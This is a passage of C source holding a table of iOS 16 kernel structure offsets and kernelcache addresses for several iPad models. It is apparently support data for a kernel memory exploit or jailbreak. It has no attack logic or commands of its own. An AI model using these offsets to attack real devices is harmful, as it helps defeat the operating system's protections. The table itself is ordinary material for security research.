+ 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a48d288, .kernelcache__gPhysBase = 0xfffffff00791c100, .kernelcache__gPhysSize = 0xfffffff00791c100 + 8, .kernelcache__gVirtBase = 0xfffffff00791a2d8, .kernelcache__perfmon_devices = 0xfffffff00a4cb520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c84c, .kernelcache__ptov_table = 0xfffffff0078cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ca990, .kernelcache__vm_pages = 0xfffffff0078cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ca988, .kernelcache__vn_kqfilter = 0xfffffff007f5b9d0, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPad13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a525ab0, .kernelcache__gPhysBase = 0xfffffff0079302a8, .kernelcache__gPhysSize = 0xfffffff0079302a8 + 8, .kernelcache__gVirtBase = 0xfffffff00792e460, .kernelcache__perfmon_devices = 0xfffffff00a565550, .kernelcache__perfmon_dev_open = 0xfffffff007f3108c, .kernelcache__ptov_table = 0xfffffff0078e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a564910, .kernelcache__vm_pages = 0xfffffff0078e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a564908, .kernelcache__vn_kqfilter = 0xfffffff007f7fbe0, }, // iPad Air 4th Cellular// // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPad13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3d1190, .kernelcache__gPhysBase = 0xfffffff00783c0c8, .kernelcache__gPhysSize = 0xfffffff00783c0c8 + 8, .kernelcache__gVirtBase = 0xfffffff00783a2a8, .kernelcache__perfmon_devices = 0xfffffff00a40c3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef41c4, .kernelcache__ptov_table = 0xfffffff0077ef378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a40b800, .kernelcache__vm_pages = 0xfffffff0077ec090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ee328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a40b7f8, .kernelcache__vn_kqfilter = 0xfffffff007f46780, }, //iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPad13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3dd190, .kernelcache__gPhysBase = 0xfffffff00783c1b0, .kernelcache__gPhysSize = 0xfffffff00783c1b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783a390, .kernelcache__perfmon_devices = 0xfffffff00a4183b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef80f4, .kernelcache__ptov_table = 0xfffffff0077ef3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a417800, .kernelcache__vm_pages = 0xfffffff0077ec0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ee368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4177f8, .kernelcache__vn_kqfilter = 0xfffffff007f4a6a0, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPad13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3dd190, .kernelcache__gPhysBase = 0xfffffff00783c1b0, .kernelcache__gPhysSize = 0xfffffff00783c1b0 + 8, .kernelcache__gVirtBase = 0xfffffff00783a390, .kernelcache__perfmon_devices = 0xfffffff00a4183b0, .kernelcache__perfmon_dev_open = 0xfffffff007ef80f4, .kernelcache__ptov_table = 0xfffffff0077ef3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a417800, .kernelcache__vm_pages = 0xfffffff0077ec0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ee368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4177f8, .kernelcache__vn_kqfilter = 0xfffffff007f4a6a0, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E246", .device_id = "iPad13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a481208, .kernelcache__gPhysBase = 0xfffffff007917fc0, .kernelcache__gPhysSize = 0xfffffff007917fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007916198, .kernelcache__perfmon_devices = 0xfffffff00a4bf520, .kernelcache__perfmon_dev_open = 0xfffffff007f0864c, .kernelcache__ptov_table = 0xfffffff0078cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4be990, .kernelcache__vm_pages = 0xfffffff0078c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4be988, .kernelcache__vn_kqfilter = 0xfffffff007f57538, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPad13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a481208, .kernelcache__gPhysBase = 0xfffffff007917fc0, .kernelcache__gPhysSize = 0xfffffff007917fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007916198, .kernelcache__perfmon_devices = 0xfffffff00a4bf520, .kernelcache__perfmon_dev_open = 0xfffffff007f0864c, .kernelcache__ptov_table = 0xfffffff0078cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4be990, .kernelcache__vm_pages = 0xfffffff0078c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4be988, .kernelcache__vn_kqfilter = 0xfffffff007f57538, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPad13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a48d288, .kernelcache__gPhysBase = 0xfffffff00791c100, .kernelcache__gPhysSize = 0xfffffff00791c100 + 8, .kernelcache__gVirtBase = 0xfffffff00791a2d8, .kernelcache__perfmon_devices = 0xfffffff00a4cb520, .kernelcache__perfmon_dev_open = 0xfffffff007f0c84c, .kernelcache__ptov_table = 0xfffffff0078cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ca990, .kernelcache__vm_pages = 0xfffffff0078cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ca988, .kernelcache__vn_kqfilter = 0xfffffff007f5b9d0, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPad13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a525ab0, .kernelcache__gPhysBase = 0xfffffff0079302a8, .kernelcache__gPhysSize = 0xfffffff0079302a8 + 8, .kernelcache__gVirtBase = 0xfffffff00792e460, .kernelcache__perfmon_devices = 0xfffffff00a565550, .kernelcache__perfmon_dev_open = 0xfffffff007f3108c, .kernelcache__ptov_table = 0xfffffff0078e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a564910, .kernelcache__vm_pages = 0xfffffff0078e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a564908, .kernelcache__vn_kqfilter = 0xfffffff007f7fbe0, }, // iPad Pro 11 inch 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,4", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 